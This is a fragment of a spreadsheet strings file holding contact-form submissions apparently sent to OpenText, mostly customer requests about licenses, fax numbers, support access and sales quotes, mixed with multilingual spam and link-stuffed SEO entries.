    <t>Если вы с партнером давно вместе и считаете, что свободные отношения разнообразят вашу тоску и внесут в жизнь что-то новое — вы оба ошибаетесь. Скорее, они смогут ...читайте об этом подробнее на сайте [url=http://nalatty.com]nalatty.com[/url]</t>
  </si>
  <si>
    <t>Мягкая черепица – современный кровельный материал с повышенными техническими характеристики, которые соответствуют практически всем заданным требованиям. Мягкая черепица может быть использована на крыше любого типа, но чаще применяется для кровли домов, коттеджей, загородных поместий, подробнее об этом читайте на сайте [url=http://roofor.ru]roofor.ru[/url]</t>
  </si>
  <si>
    <t>We or trying to reset or password and it is giving us a error message</t>
  </si>
  <si>
    <t>We are planning to migrate the applications based on Global360 Case And Image Manager to the Cloud. We need to know whether Global 360 is supported on Red Hat Linux and Apache Tomcat Server. Please specify versions of software and the Tomcat server and Reh Hat Linux supported._x000D_
_x000D_
Thanks_x000D_
Pranshu B Saxena</t>
  </si>
  <si>
    <t>Health information management solutions</t>
  </si>
  <si>
    <t>Need to get a quote for the supply of RightFax Enterprise Server for deployment to Saudi Arabia.</t>
  </si>
  <si>
    <t>We are looking for a document management system for our legal department. The legal team is spread out in various countries (U.S., Canada, Isle of Man, Malta, UK and Ireland. We are looking to get a contract signed by year end.</t>
  </si>
  <si>
    <t>Company interest to start a project to scan Invoices into SAP for AP and for Customer Order Processing</t>
  </si>
  <si>
    <t>I am trying to renew my Brava Reader free software and get this notice when I try to login Invalid license._x000D_
Unable to load files._x000D_
_x000D_
An update is required for Brava! Reader._x000D_
Please contact your supplier for an update._x000D_
I have to do this about every six months and it is always extremely painful. _x000D_
Can you send me a link where I can renew my license? _x000D_
Mike MacLean _x000D_
403-616-6801_x000D_
mike@macleanrealty.com</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
We are in process of migrating from 11SP2 to 11SP5 from AIX to LINUX platform. We will need below s/w and license to proceed, please provide and let us know if any questions:_x000D_
_x000D_
-	iServer 11SP5 software, install doc and license_x000D_
-	E.ReportDesigner 11SP5, software, install doc and license._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have a customer migrating from on-prem to Office 365 cloud.  They would like to port their fax numbers to a cloud fax provider.  Do you support porting fax numbers from BT to your service to support their operation in Wales?  If so, I would like to put you in contact with our customer.   Thank you!  </t>
  </si>
  <si>
    <t>i use the android app. many features in the ios version are non existent in the android version. when could an update for android add almost if not all the features in the ios version?</t>
  </si>
  <si>
    <t>Angebotsanfrage</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in certification as more and more RFP's I'm responding to have that as a requirement.  I'm currently a technology partner since 2011, and was previously an OT employee in Professional Services.  I noticed that there is a System Administrator certification class running in late December.  Course-wise, I haven't done most of the prerequisites, but I've probably picked up most of it (the bulk of what I don't know is along the lines of differences in administration of CS 16 and up).  I noticed that there are no dates (in NA) for developer certification.  I've been doing Oscript since 1998 and continue to develop in CS 16.2.  Do you offer partners a chance to simply write the exam?  For Developer certification, I think I could probably do that if that option is available. For administrator certification, I think I'd benefit from the certification course. I'm wondering if I need a phone call with someone to discuss my exact needs. If so, my cell number is in the contact info above._x000D_
Thx in advance_x000D_
</t>
  </si>
  <si>
    <t>We currently have 25 licenses for Brava Desktop SX Build 7.4.0.132 with a network license server.  We need to move the license server to a new location and realized that we do not have a support agreement anymore (expired July 2016).  I would like to request a quote for a support agreement in order for us to proceed with this work._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>My new easylink email address should be lauren.weaver@iqvia.com and not lauren.davis@iqvia.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have a customer that wants to implement an Archiving Tool to comply with the new European Law GDPR in his SAP ECC system, so he wants that I present him which tool I would recomend him._x000D_
_x000D_
For that, I would like to know the minimal HW requeriments to implement Opentext for SAP and the effort stimated to be done by the SAP Technical Team during the implementation and to maintain/administer the tool._x000D_
Could you share with me this information please? (I know that it would be an estimation but it could contain a minimun/average/maximun of the HW needed and SAP Technical effort)_x000D_
_x000D_
Thanks in advance and kind regards</t>
  </si>
  <si>
    <t xml:space="preserve">Today I try to get access to your knowledge base, to download the new Team Developer Software. But we can not successfully finish the Site Access Request. Please add our Enduser Nummer: EU0278033 to our account software@vossen.com to access the knowledge base and download the last software. _x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t>We are looking for a FAX server application, FAX server has to convert the customer incoming FAX into Email and forward to the support executive. Response from the support executive has to be converted as email and send back to the recepient.</t>
  </si>
  <si>
    <t>Partnership with our now being formed World Alliance For Climate. Is a non profit corporation dedicated to Geo Engineering proven and natural methods to mitigate CO2 and bring about change for a healthy planet. We have a Solution. greensaharaproject.org.</t>
  </si>
  <si>
    <t xml:space="preserve">What is the correct number I should put in my e-mail for people to use this services._x000D_
e.g. 01184501715@janice.bridge@iqvia.com it's the number that I need many thanks </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
unser Kunde Lear Corporation GmbH hat uns direkt an Sie verwiesen, bezüglich der DFÜ-Verbindung. Er nannte mir die Mailbox AMR56332 bei der ich die Änderung beantragen muss._x000D_
_x000D_
Könnten Sie mir hier weiterhelfen die Verbindung von OFTP1 zu OFTP2 umzustellen und zu testen?_x000D_
_x000D_
Vielen Dank im Voraus._x000D_
_x000D_
Freundliche Grüße_x000D_
Gina Senft</t>
  </si>
  <si>
    <t>przegladanie rysunkow DWG</t>
  </si>
  <si>
    <t>Hej._x000D_
jag underöker för kunds räkning möjliga lösningar för dokumenthanteirng. Konkret handlkar det om att ersätta gemensamma diskar med en smartare lösning. har hört mycket om Documentum men inte sett det. Kan ni vara vänliga och kontakta mig för en kortae telefonmöte så jag kan få veta mer?_x000D_
Mvh_x000D_
Peter falkj</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently looking for a solution for HR and logistic purposes for Capture and Digitization.  Our company has a partnership with Accenture, and they indicated they user EMC Documentum and Capture.  I would like to get a demo of the product and the pricing and licensing._x000D_
_x000D_
I noticed there is no direct partner in Sri Lanka, hence how can go about getting the demo and pricing?_x000D_
_x000D_
Problem summary: _x000D_
Logistic - Legacy SharePoint based application from local vendor that is integrated with Kofax express.  Annual scan volume are around 1-2 million scans._x000D_
_x000D_
HR - Volumes are around 400-600,000. Currently there is no digitization solution in use._x000D_
_x000D_
We Brandix are Sri Lanka's No 1 apparel exporter manufacturing apparels for leading brands in the US, Europe and Asia.  For more about brandix please visit us at www.brandix.com </t>
  </si>
  <si>
    <t xml:space="preserve">	_x000D_
_x000D_
Bonjour,_x000D_
_x000D_
Après une étude de vos campagne Adwords , nous constatons qu’il y a des mots clés très intéressants sur lesquels vous n’êtes pas positionnés sur Google._x000D_
_x000D_
Nous sommes sous-traitants pour les agences web européennes et canadiennes, par conséquent nous connaissons les meilleures méthodes d’optimisation d’Adwords._x000D_
_x000D_
Dans votre cas la gestion, « des options de correspondance des mots clés » et « Les mots clés négatifs » ne sont pas optimisés à 100%, ce qui engendre un coût d’acquisition bien plus élevé._x000D_
_x000D_
Dans les années 2005-2013, Adwords était plus simple à gérer car il y a avait moins de concurrents, donc des campagnes rentables plus facilement. Maintenant  Adwords est un outil plus puissant qui exige une parfaite maîtrise et  une gestion quotidienne pour le réglage des paramètres._x000D_
_x000D_
Notre agence est spécialisée dans le référencement Adwords ultra concurrentiel._x000D_
_x000D_
Dans 95% des cas, nos clients réduisent de 30% les coûts adwords_x000D_
_x000D_
Nous proposons des frais de gestion 2 à 3 fois moins cher que les agences françaises et sans frais de set-up. _x000D_
_x000D_
N’hésitez pas à nous contacter, nous saurons vous satisfaire._x000D_
_x000D_
_x000D_
_x000D_
		Bien cordialement,_x000D_
		Caroline RAFIDISON_x000D_
		Marketing Wholesaler Website_x000D_
		ID SKYPE: W2CONTACT_x000D_
		Paris, France / Téléphone: +331 78 90 06 06_x000D_
		Antananarivo, MADAGASCAR / Téléphone: +261 3402 54437_x000D_
		www.wholesaler-website.com_x000D_
		Lot IPA 14 bis Ambohidahy Itaosy_x000D_
		caroline@wholesaler-website.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have requested for My support access but nobody from OT contacted me, I have received message "Account Verified Successfully for access to opentext.com_x000D_
_x000D_
If you requested My Support access; you will receive an email notification from your OpenText Support representative with confirmation."_x000D_
_x000D_
Please help</t>
  </si>
  <si>
    <t>I love you</t>
  </si>
  <si>
    <t>Please grant me OpenText Knowledge Centre Access for my Deloitte email ID</t>
  </si>
  <si>
    <t>I am trying to login to support.opentxt.com or go to My Support to download my license but I am getting message "We're sorry, your account does not grant you access to this resource.".  Could you please check?</t>
  </si>
  <si>
    <t>I received an email about my fax number but the space was blank, so need to know what my fax mail number is</t>
  </si>
  <si>
    <t>Длина рейки от 1,5 до 3,5 м. В состав той же пксд или пкс входят различные сооружения, а также множество оборудования. [url=https://youmet.ru]https://youmet.ru[/url] От типа подъема платформы тележки - ручной или электропривод существуют разновидности моделей тележек с подъемной платформой: Тележка с ручным гидравлическим подъемом платформы. Сегментный листогиб купить, трубогибы ручные, купить швонарезчик</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
As our organization begins to evaluate potential DAMS vendors, I’m wondering if you would be able to answer some questions (see below). _x000D_
_x000D_
A little about us – The Royal BC Museum in Victoria, BC is a mid-sized museum with about 560,000 assets (primarily images, with some video and audio) on a self-hosted server. We are currently using MediaBeacon as our asset management system. Once we have selected a vendor, we will be looking to make the switch at the end of this fiscal year (March 31, 2018). _x000D_
_x000D_
Access &amp; End-User Experience_x000D_
_x000D_
•	Does your system work across all major web browsers?_x000D_
•	Does your system offer access controls with roles and permissions? (e.g. role based, group based and/or folder based, ability to limit deletion capabilities to super admins)._x000D_
•	Are there any limits to the number of  users/administrators?_x000D_
•	Does your system offer options for implementing usage restrictions (e.g. if an item is sensitive, can we control which users/user groups can download, view, etc.?)_x000D_
•	Are there internal authentication systems (single sign-on, compatibility with LDAP)?_x000D_
•	Does your user view offer in-line editing in fields?_x000D_
•	What are the previewing capabilities?_x000D_
•	Do you offer options for individually controlled favourites, saved searches, baskets?_x000D_
•	Are users able to produce printable contact sheets?_x000D_
•	Does your system offer shareable downloads?_x000D_
•	Would you consider your system intuitive, with the ability for fast adoption and ease of use?_x000D_
_x000D_
Search Features_x000D_
_x000D_
•	What search features does your system offer?_x000D_
•	Can you add and edit keywords in bulk?_x000D_
•	Does the system offer any image recognition functionality for auto-tagging?_x000D_
_x000D_
Asset Management_x000D_
_x000D_
•	Does your system provide image/video transcoding (custom and preset)?_x000D_
•	What are the supported file formats?_x000D_
•	Does your system offer any preservation functionality? E.g. checksums for corruption._x000D_
_x000D_
Analytics &amp; Reporting Features_x000D_
_x000D_
•	What are the reporting options? (search, asset, system)._x000D_
•	Are</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, i have change computers and i need the program installer to put the program in my new computer. Can you help me send me the BRAVA DESKSTOP CXL. My username is ablancoc@cfia.or.cr, so you can check i bought the program. Can you help to with instructions to register the program._x000D_
_x000D_
Thank You. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I received an email from support@easylink.com in regard to how to send fax from my new IQVIA email address. However, the email did not contain the fax number. Is the fax number the same I used with my Quintiles email address?_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Hi  I'm consulting at SAIT as part of a larger ERP project and came across VPOM. Best I can figure is that it is your product. If so, I'd like to know if it is still supported, certified on Redhat 7 and how to tell the version of the product being run here. Thank You. Email is preferred. Regards</t>
  </si>
  <si>
    <t>The e-mail I received regarding updated faxing information did not include my inbound fax number</t>
  </si>
  <si>
    <t>Referred by Radial for EDI support services.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you interested in Opt-In list of Manufacturing Industry decision makers? _x000D_
_x000D_
If so, you are at the right place. Please let me know your requirement to get a quote and few sample contacts at no cost._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bert Connell</t>
  </si>
  <si>
    <t>Looking for Alternative to On-Base</t>
  </si>
  <si>
    <t>Need to re-set my EDI testing account for JCPenney.  Please email me!  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;i&gt;BloodStain Removal: 8 Common Items That Do the Trick ... Your browser indicaets if you've visited this link&lt;/i&gt;.&lt;br&gt; Cats( ColorPhotography) Posters at  Choose from over 500,,000 Posters and Art Prnits. Value Framing, Fast Delivrey, 100% Satisfaction  to Find Lost Pets:CatColor /Breed Guide- MSPCA-Angell Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
 [url=http://2constaociachic6.soup.io/]Weird things about cats[/url] [url=http://852iritcheihob0.soup.io/]Why does my cat growl[/url]  _x000D_
 HowToClean AMattress- HousewifeHow-Tos Your browser indicates if you've visited this link Knowinghowtoclean  are tough but not impossible togetoutonce they'redry , ... The tip for gettingurinestain out has worked a ...  /clean/how-to-clean-a-mattrfess/ More results.&lt;br&gt; Find great deals on eBay for cat pheromone diffuser. ... See more like this Comfort Zone with Feliway 2-Pack Cat Diffusers Pheromone Sprays Pllug-Ins  _x000D_
male cat marking indoors _x000D_
 _x000D_
 Removalof Cat Urinefrolm  rid of cat urineodors &amp; peturineodors  stains. Home Remedy. Natural cleaning products used.&lt;br&gt; &lt;h3&gt;why does mycatbitemyhairafter I wash it?  Yahoo Answers Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
  [url=http://72evsubseyo0b.soup.io/]Ginger tabby[/url] [url=http://60peclatnajis2.soup.io/]Feline urinary tract diet[/url]  _x000D_
 One of my daughters has a bedwetting problem and we no longer have amattresscover, how do Igettheurinesmelloutwith a home remedy or something very  toGetSmelluOtofMattressGetSmellOut Your browser indicates if you've visitedthis link&lt;/h2&gt;.&lt;br&gt; See a rich collection of stock images, vectors, or photos forcat-scratchyou can buy on Shutterstock. Explore quality images, hpotos, arty &amp;  was just a smallscratchfrom acat- Daiy Mail Online Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
bengal tiger cat price _x000D_
 _x000D_
&lt;u&gt;HousetrainingAdultDogs- Dogtimje Your briwser indicates if you'ce visited this link&lt;/u&gt;.&lt;br&gt; 22 Sep 2008 ... CLICK HERE  No m</t>
  </si>
  <si>
    <t xml:space="preserve"> 12 С‚СЂР°РІ. 2004 СЂ. -We have three cats, one seven years old, ne two yeras old, and one just a year old. We think it's the youngest with the problem  Do Cats Urinate on Your Clothes &amp; Bed? - Pets&lt;/u&gt;.&lt;br&gt; If your cat is in heat or pregnant, please look to see if there is another programnearyou as Help Fix ME ... for spay/neuter surgery but ohterservicesare  CostServices- San Antonio Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
 [url=http://7denoboigk.soup.io/]Aerosol spray can trigger[/url] [url=http://401noatordiu-hatu.soup.io/]Camouflage spray paint[/url]  _x000D_
 PLEASE DO NOT PEE ON THE FLOOR sign. US-made Rules and Cleaning sign or stficker for your Restroom sign needs. 5-Star Vendor. Easy Ordering. Low Price Promise. Fast  Why Is There Pee on the Floor? - VICE &lt;/h3&gt;.&lt;br&gt; &lt;strong&gt; How I FINALLY Stopped My Cats From Peeing and Pooping ... &lt;/strong&gt;.&lt;br&gt;  _x000D_
well &amp; good calming aid for cats revierw _x000D_
 _x000D_
 Tidy Cats Breeze CatLitterPellets , 7-lb bag -  Your browser indicates if you've visited this link BreezeLitterPelletsallow urine to pass through to the odor-controlling Breeze Cat Pad underneath, ... But this is theBestprice I've found!!   More results.&lt;br&gt; Hematuria ih most cases does not stain the urine to the extent that it will be visibly red or pink. In severe cases where there is significant bleeding in the  - abnormal color: MedlinePlus Medical Encyclopedia&lt;/h2&gt;.&lt;br&gt;  _x000D_
  [url=http://2limifosu4n.soup.io/]Dog peeing on bed[/url] [url=http://41rhamacacruxs.soup.io/]Pee on sofa[/url]  _x000D_
 Howtoget rid of DogUrineOdorCarpet . FREE Natural Recipe Your browser indicates if you'fe visited this link  rid of dogurinesmells fromcarpet . Home remedy, dog peeodor&amp; stain remover that really works   Moer results.&lt;br&gt; Buy HappySeatCatSoft-Padded RoundToiletSeatin Blue ... Your browser inducates if you've visited this link Buy HappySeatCatSoft-Padded RoundToiletSeatin Blue/White from  at Bed Bath &amp; Beyond. Boasting brightness and style, the HaplySeatRoundTo</t>
  </si>
  <si>
    <t xml:space="preserve">I received an email that was supposed to contain my registered fax number and email address for faxmail but there was no number or email (see below of what I received).  Please provide me the phone number and faxmail email address_x000D_
_x000D_
    Fax to E-mail service:_x000D_
_x000D_
       Below is your registered fax number(s) and e-mail address(es)_x000D_
       for inbound service:   _x000D_
_x000D_
       _x000D_
_x000D_
HOW TO USE E-MAIL TO FAX:_x000D_
</t>
  </si>
  <si>
    <t>We are interested in purchasing the services of Screen Capture for some of our users, pricing and requirements are needed. How soon can I have the basic information of what needs to be done and what the minimum requirements are to have the system ready and start screen recording for 5 users?, this is what we need right now but the requirement will definitely grow</t>
  </si>
  <si>
    <t>SSA would like to schedule a CCM solution demonstration at HQ with OpenText. Please email me at your earliest convenience for instruction documentation. Thank you.</t>
  </si>
  <si>
    <t>Good morning, I sent Stella Frazier an email this morning about a maintenance renewal for our Encase dongle. I'm just following up here in case she's out of the office and unable to reply.  Thanks.</t>
  </si>
  <si>
    <t>We need to renew/order licenses. Thanks!</t>
  </si>
  <si>
    <t>Interested in finding out about Email delivery options. Do you offer any of that functionality?</t>
  </si>
  <si>
    <t>I came across your website when I was looking for a way to manage notifications to our clients.  I was wondering if OpenText offers this type of solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Currently have 3 fax numbers we use for faxing.  Low volume faxing maybe 15 faxes a month.  Interested in moving off our physical fax lines to a email based fax. Trying to get some idea of pricing and whether or not the a cost justification.  </t>
  </si>
  <si>
    <t>Can you please confirm my e-fax number? I only received details of my outbound email address.</t>
  </si>
  <si>
    <t>Contato comercial para estrutura de serviço de van para o Banco Máxima.</t>
  </si>
  <si>
    <t>Please provide us the expiration details about our Open Text Support Contract and also provide a Budgetary Quote for RightFax Support. We are also planning to Move to Cloud, so If there is a solution that can integrate in O365 Exchange, Please let us know. Thanks.</t>
  </si>
  <si>
    <t>Conocer la solución de OpenText Exstream - Customer Communication Management</t>
  </si>
  <si>
    <t>Buenos Días, quisiera saber si me pueden indicar algún partner para Costa Rica que tenga experiencia en implementar el ECM de ustedes, Muchas gracias._x000D_
_x000D_
Saludos!</t>
  </si>
  <si>
    <t>Buenos Días, quisiera saber si me pueden hacer el contacto con empresas en Costa Rica (partner) que implementen el ECM de ustedes.  Muchas gracias</t>
  </si>
  <si>
    <t>Looking for an intelligent Asset Management system with advanced functions for asset management throughout the entire life cycle of a production from pre production through delivery and archive.</t>
  </si>
  <si>
    <t>The link to the VRS to provide our banking information expired before we were able to complete it (due to travel outside the country). Can you please send a new link in order that we can complete the form. Thank you.</t>
  </si>
  <si>
    <t>Need to begin trading electronically with a new customer and need assistance from you to set this up.</t>
  </si>
  <si>
    <t>Hello!_x000D_
We are interested in your product OpenText Gupta Report Builder. Could you please give us contact information of a manager responsible for our region so we could discuss prices and conditions. Looking forward for your prompt reply! Best regards,Kristine</t>
  </si>
  <si>
    <t>Please add the following staff to enter support tickets:  _x000D_
Masters, Benjamin &lt;Benjamin.Masters@allegiancehealth.org&gt;; _x000D_
Socks, Mark &lt;Mark.Socks@allegiancehealth.org&gt;</t>
  </si>
  <si>
    <t>I am interested in finding information on when the following courses will be offered in Ottawa next (after November). 1-0101 OpenText Content Server Knowledge Fundamentals, 2-0120 OpenText Records Management 10.5, and 3-0126 System and Search Administration v10.5 SP1.</t>
  </si>
  <si>
    <t>I'm unable to log in and if my password is wrong there is no option to reset this.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
We are a Software development company from India. One of our long-term customers is interested in the OpenText BI solution._x000D_
_x000D_
We realize that there are implementation partners in India. But before we engage with them, we wanted to get an initial understanding about your solution directly from you. We have 3 initial queries to proceed._x000D_
_x000D_
1. What is your pricing model – is it per seat, per report, per location? Also implementation changes, if separate. We are trying to formulate a probable cost of ownership for our customer._x000D_
2. Do you have predefined canned reports/templates/dashboards for the manufacturing domain (Our customer is a manufacturing company)_x000D_
3. What is a typical implementation/deployment lifecycle (in calendar months) with OpenText BI (OTBI)_x000D_
_x000D_
Would highly appreciate a quick reply from your team before we engage with your Indian counterparts. Thanks. </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren_x000D_
_x000D_
Wir kontaktieren Sie im Rahmen einer Wiedervermietung von drei Wohnungen am Kirchweg in Nussbaumen AG. _x000D_
_x000D_
Gerne möchten wir Sie anfragen, ob die Möglichkeit besteht, dass die Wohnungen intern bei Ihnen inseriert werden? Es handelt sich dabei um eine 2.5-, 3.5- und eine 4.5-Zimmerwohnung._x000D_
_x000D_
Die Wohnungen sind geografisch für Mitarbeiter eines Unternehmen im Grossraum Baden AG gut gelegen._x000D_
_x000D_
Über eine positive Rückmeldung freuen wir uns sehr._x000D_
_x000D_
Bei Fragen oder anderen Anliegen stehen wir Ihnen gerne zur Verfügung._x000D_
_x000D_
Freundliche Grüsse_x000D_
_x000D_
_x000D_
David Bachmann | Assistent Immobilienbewirtschaftung_x000D_
_x000D_
H&amp;B Real Estate AG | An international Associate of Savills_x000D_
Lagerstrasse 107 | CH-8004 Zürich_x000D_
Tel:         +41 44 250 52 52 (Hauptnummer)_x000D_
Tel:         +41 44 250 44 22 (Direktwahl)_x000D_
Fax:        +41 44 250 52 69</t>
  </si>
  <si>
    <t>Dear Ladies and Gentlemen_x000D_
_x000D_
please send me an update (possibly a license) for my installed program_x000D_
"Brava! Free dwg viewer"_x000D_
_x000D_
Many thanks: Josef Kis</t>
  </si>
  <si>
    <t>Need trial version to test the feasibility of the tool. Please let us know if trial version is available for the OCR product.</t>
  </si>
  <si>
    <t>As agreed with Simone Harding, I need a quote for a tender for the_x000D_
Amprion GmbH_x000D_
Rheinlanddamm 24_x000D_
44139 Dortmund_x000D_
_x000D_
BTC want to migrate the existing Saperion archive to the OT Archiving Solution (S-IXSPGSAP Archiving for SAP Solutions). _x000D_
1.200 named respectively 400 concurrent users_x000D_
start of runtime:	01.01.2017_x000D_
period: 60 month_x000D_
_x000D_
_x000D_
Please, send me a quote for this tender. If you have any further questions, do not hesitate to contact me._x000D_
_x000D_
With Kind regards_x000D_
Alexander Paul</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have just changed my account email address from tomas.krivjansky@hafslund.no to tomas.krivjansky@hafslundtellier.no and I am no longer able to get to my MySupport page, where I can download Opentext Exstream software, that we have licensed. Could you have a look at what might be the problem?_x000D_
_x000D_
Thank you_x000D_
Tomas Krivjansky</t>
  </si>
  <si>
    <t>Currently through third party supplier who utilise Xstream.  Looking to bring composition and communication in house with internal web function, and document composition prior to sending to print organisation.  Currently have in excess of 5 million letters/bills sent annually, plus electronically held online. Looking to transform out communication strategy.</t>
  </si>
  <si>
    <t xml:space="preserve">ACCA Marketing Opportunities - Potential meeting within Singapore this week? </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
one of our customers (Nordstrom) asks us to implement EDI communication and to publish them UPC catalog thorough your network._x000D_
Would you write me back to understand how to subscribe your service and integrate it?_x000D_
_x000D_
Waiting a kind feedback_x000D_
Regrads_x000D_
Gabriele Faelli_x000D_
</t>
  </si>
  <si>
    <t>To access My Support and download EMC &amp; OpenText Product.</t>
  </si>
  <si>
    <t>We have a local support for Rightfax in kuwait with a company called 4th Dimensions. We have an issue with our Rightfax in production environment and we are not able to reach any contacts from this company._x000D_
Please suggest what to do</t>
  </si>
  <si>
    <t>I would like to inquire about your BIRT reporting tool</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
Hope you having a nice day!!_x000D_
I am from CCJK. We focus on Chinese, Japanese and Korean languages’ translation services._x000D_
If there is any possibility to get some translation jobs from your esteemed company?_x000D_
Looking forward to hearing from you!_x000D_
Best regards_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I was trying to raise a ticket in OpenText but unable to get the My support access. _x000D_
It gets into loop even after verifying auto generated email multiple times._x000D_
I cant paste the screen shot here. Please help me get access to MY support section,its been more than a week I have been placed a request for my support. Haven't received any emails.  _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Many thanks! I appreciate it! _x000D_
canadianpharmaciesbnt.com _x000D_
best canadian prescription prices_x000D_
</t>
  </si>
  <si>
    <t>Can we buy support service of Documentum directly from OpenText instead of buying from HPT (3rd party company). If we can, how to do? Please give us an advice.</t>
  </si>
  <si>
    <t>I would like to ask about the server specifications for OpenText 16. We are going to implement Opentext along with Sap student lifecycle management, we would like to determine what is server specifications ( such as CPU, Memory, disk..) to prepare._x000D_
Thanks.</t>
  </si>
  <si>
    <t>i want to know how to send fax received with electronic fax</t>
  </si>
  <si>
    <t>Привет всем участникам! _x000D_
Нашел Приколы с Фото на этом сайте:  http://wozap.ru : _x000D_
http://wozap.ru/foto-prikoly-interesnoe/5107-vetnam-sceny-iz-zhizni.html [b] Вьетнам: сцены из жизни [/b] _x000D_
[url=http://wozap.ru/foto-prikoly-interesnoe/7267-top-10-samyh-dorogih-avtomobiley-v-mire.html] ТОП-10 самых дорогих автомобилей в мире [/url] _x000D_
http://wozap.ru/foto-prikoly-interesnoe/2099-postydnye-priznaniya-izvestnyh-lyudey.html _x000D_
http://wozap.ru/foto-prikoly-interesnoe/1095-progulka-po-kenigsbergu.html</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;u&gt;Removing Urkne mells fom Mattresses  С‚СР°РІ. 2014 СЂ. -Removingstains and odors from a child'smattressis a nasty job, but with this simpel method ... Gettingurinestains andsmellsout of  &lt;h4&gt;How to Remove Urine Smell from Mattress -  tormeove urine smell fromurine-odors-mattress/ SoggyDIY Method for Removing Urine Stains and Smell Recipeheavily with borax. Borax will neutralize theurine odor . Be sure to cover the whole area. The jury is out on whether or not Borax is toxic. Just don't eatto Easily Remove Old Pee Stain and Smelll from a  СЃРµСЂРї. 2014 СЂ. -Tutoria  on how toremove peestain frommattressusign natural ingredients! It's an easy, quick, and effective cleaning solution. Be rid ofWays to Remove Urine Stains from a Mattress -  СЃРµСЂРї. 2013 СЂ. -There is however, a really effective and really inexpensive method forremoving urinefrommattreases , clothing, caarpet and just aboutUrine Stains and Odors From Mattresses - The  how toremove urinestains andodor rfom mattresses ..&lt;br&gt;.&lt;br&gt; &lt;i&gt;What MakesFemaleCatsUrinate on Stuff? - Pets Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://005terpunihain.soup.io/]Timid cat behaviour[/url] [url=http://83guemorneno5a.soup.io/]How to get your cat to stop peeing[/url]  _x000D_
 This article brings you list of all thebestautomaticcatlitterboxes, so you can pick one according to your choice - that  Get (2016!) Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; &lt;h3&gt;CatDog PetUrineOdor Removal SCOE 10X Super Concentrated ... Your browsere indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
comfrt zone refills for cats _x000D_
 _x000D_
 &lt;i&gt;BengalKittensFor Sale, Exotic spottedBengalcats , Photos  decidesd that aBengalcatis the one ... Looknig  own 2 n the past had a F-1 and a F-3 mu wife got to keep them becwuse we didn  aBengalKitten BengalCatsвЂ“ Bengals Ilustrated&lt;/u&gt;.&lt;br&gt; Removing the smell of cat urine from carpet ... SIMPLE SOLUTIONS FOR REMOVING CAT URINE ODOR. How to Get Rid of Cat Urine Smell in Ca</t>
  </si>
  <si>
    <t>Hello,_x000D_
gud morning._x000D_
_x000D_
Am lubna begum of b.tech final year have a knowledge on core &amp; advance java,.Net,C &amp; C++ needs a job to publish my knowledge to every one by working in your organization._x000D_
thanking you._x000D_
yours sincerely,_x000D_
Lubna Begum</t>
  </si>
  <si>
    <t>Лишний вес – распространенная проблема 21 века среди многих женщин, независимо от возраста и социального статуса. Его набирают не только из-за неправильного питания, но и физиологических особенностей, наследственной предрасположенности.Читайте об этом подробнее на сайте [url=http://ladysarafan.ru]ladysarafan.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> Ad op Rated OozneOdorEliminator. Free S&amp;H, Try our Risk Free Trial!  CatUrineOdorwith Homemade Cleaners-Pet Stains Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; BengalCat :  Your browser indicates if you've visited this link Free next day delivery on eligible orders for Amazon prime members  Buybengalcaton   /slp/bengal-cat/qkkthxj4qvbz5b9 More results.&lt;br&gt;  _x000D_
 [url=http://723stirintasajz.soup.io/]Bread cat pillow[/url] [url=http://tanama-aqb.soup.io/]Plug in rodent repellent[/url]  _x000D_
 Great Amazon Must Haves for anyCatOwner: Feline GREENIES Dental Treats fortCats :   examinatin of the cat. How to get started.  NCBI&lt;/i&gt;.&lt;br&gt; &lt;h2&gt;Catand Dog Abscess and Bite Wound Identification ... - Vetstreet Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
bedngal cat breesding information _x000D_
 _x000D_
 &lt;i&gt;WhydoCatsBite TheirOwners ? - Pets Guide Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; Shopdogtrainingpadsin the pet waste management section of  Find qualitydogtrainingpadsonline or in  Etsy Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
  [url=http://obprofimmeoq.soup.io/]Feliway calming diffuser[/url] [url=http://70trucluven-gew3.soup.io/]Getting rid of cat smell in a house[/url]  _x000D_
 We would like to show you a descritpion here but the site wonвЂ™t allow   &lt;/i&gt;.&lt;br&gt; BloodinCaUrine-  Your browser indicates if you've visited this link Bloodincaturinecan be an unsettling sign of various feline health problems. The condition, known as hematuria, can seem frightening to almost anycatowner ...   More results.&lt;br&gt;  _x000D_
what takes dog pee smell out of carpet _x000D_
